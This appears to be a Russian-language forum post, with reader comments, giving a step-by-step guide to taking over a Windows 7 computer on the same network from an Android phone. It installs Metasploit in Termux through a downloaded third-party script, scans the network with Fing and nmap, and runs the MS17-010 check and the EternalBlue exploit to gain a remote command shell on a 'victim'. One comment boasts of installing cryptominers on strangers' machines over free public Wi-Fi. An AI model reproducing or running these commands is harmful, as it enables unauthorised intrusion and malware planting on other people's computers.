Статья не совсем про KALI, ну просто не знал куда выложить эту тему, поправьте в комментах. Всё что нам для этого понадобится: Прямые руки Телефон на андроиде Fing nmap termux и metasploit или kali nethunter 1) Для начала скачаем termux из google play Теперь установим metasploit: Для этого введем серию команд: apt update apt upgrade apt install curl curl -LO https://raw.githubusercontent.com/1Tech-X/Metasploit-/master/metasploit.sh cd metasploit-framework-4.14.28 ./msfconsole Code apt update apt upgrade apt install curl curl -LO https://raw.githubusercontent.com/1Tech-X/Metasploit-/master/metasploit.sh cd metasploit-framework-4.14.28 ./msfconsole Знаю загрузка довольно долгая но нужно потерпеть. После всего у нас должен открыться metasploit После того как вы установили metasploit. 2)Сканирование сети c Fing Теперь посмотрим кто есть в нашей сети: Для этого удобно использовать утилиту Fing Вот так выглядит моя локальная сеть(у всех по разному): Можно легко увидеть "USER-ПК"(у всех всё по разному) он и будет нашей жертвой.Выбираем и запоминаем ip нашей жертвы,в моём случае это 192.168.1.104 и сканим его на порты. 3)Сканирование на открытые порты c nmap Установим этот чудесный инструмент: apt-get update apt-get install nmap Code apt-get update apt-get install nmap ip нашей жертвы,в моём случае это 192.168.1.104, сканим его на порты Код: nmap ip жертвы В моём случае это: nmap 192.168.1.104 Есть бесконечное множество настроек nmap но в данный момент подойдёт эта(из за скорости) Вот что мы видим: У меня стоит на машине 7 винда и у неё открыт 445 порт,любому более менее шарящему в metasploit человеку сразу понятно что первым делом мы будем юзать эксплоит eternalblue. 4)Проверка уязвимости Дальше пойдут скрины с консоли kali nethunter так что не пугайтесь,все команды идентичны с командами в termux.(Мне так просто реально удобнее) Для начала мы протестим на сканере возьмёт ли наш эксплоит нашу жертву в metasploit вводите: Код: use auxiliary/scanner/smb/smb_ms17_010 Здесь нам нужно указать только ip адрес жертвы Код: Выглядит это так: set RHOSTS ip жертвы В моём случае это: set RHOSTS 192.168.1.104 Запускаем **** командой run Если мы видим что-то подобное значит хост уязвим к эксплоиту 5)Теперь завершающая стадия:использование эксплоита В том же metasploit пишем use exploit/windows/smb/ms17_010_eternalblue Code use exploit/windows/smb/ms17_010_eternalblue Здесь нам нужно указать ip жертвы и процесс Ip жертвы: Код: Выглядит это так: set RHOST ip жертвы В моём случае это: set RHOST 192.168.1.104 И процесс Код: set ProcessName explorer.exe И после того как вы закончили данные манипуляции можно запускать эксплоит exploit Если всё удачно то тогда мы получим полный доступ к командной строке атакуемого компьютера.
У кого нет папки metasploit-framework-4.14.28 нужно написать после 4 действия chmod +x metasploit.sh ./metasploit.sh Ждем... И теперь она у вас должна появиться (лично у меня так)
Так же на канале overbafer1 есть видио по этому P.S. Только там нету способа как это сделать без доступа к ПК
Можно все но чтобы передать metasploit жертве нужно нужен или прямой доступ к ПК или быть в одной сети чтобы через nmap перекинуть жертве
Единственный минус на 32 бит не идёт я у себя в городе ходил по фри вифи и через метерпетер скидывал майнеры
An error occurred while installing nokogiri (1.8.0), and Bundler cannot continue. Make sure that `gem install nokogiri -v '1.8.0' --source 'https://rubygems.org/'` succeeds before bundling. Что делать